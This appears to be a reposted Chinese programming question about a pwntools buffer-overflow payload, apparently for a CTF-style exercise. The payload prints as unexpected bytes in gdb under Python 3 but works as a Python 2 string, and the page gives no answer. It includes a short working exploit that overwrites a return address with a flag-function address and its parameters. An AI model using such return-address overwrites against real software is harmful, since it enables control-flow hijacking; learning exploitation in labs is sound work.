问题描述
我有一个简单的程序,可以使用缓冲区溢出来利用它。我想使用字节发送数据,因为这是我想学习的python3在pwntools中使用的格式。当我使用 python2 作为字符串发送数据时,一切都很好,我得到了一个标志。但是当我在 gdb 中使用 python3 数据是不同的。当我尝试将其解码为 utf-8 时,它说:
UnicodeDecodeError: 'utf-8' codec can't decode bytes in position 180-181: invalid continuation byte
这是我的代码
from pwn import *
exploit = [
b"A"*180,p32(0x080491e2),#<-flag function address
b"C"*4,p32(0xdeadbeef),#<-param1 needed to exploit flag func
p32(0xc0ded00d) #<-param2 needed to exploit flag func
]
payload = b"".join(exploit)
print(payload)
我希望在内存中,在 As (0x41
) 之后,这些值 080491e2
deadbeef
和 c0ded00d
。相反,我有无意义的(对我而言)值,例如 785c3265
785c3139
.. etc
我在 leave
指令之前在 gdb 中的数据:
stack data before leave instruction
解决方法
暂无找到可以解决该程序问题的有效方法,小编努力寻找整理中!
如果你已经找到好的解决方法,欢迎将解决方案带上本链接一起发送给小编。
小编邮箱:dio#foxmail.com (将#修改为@)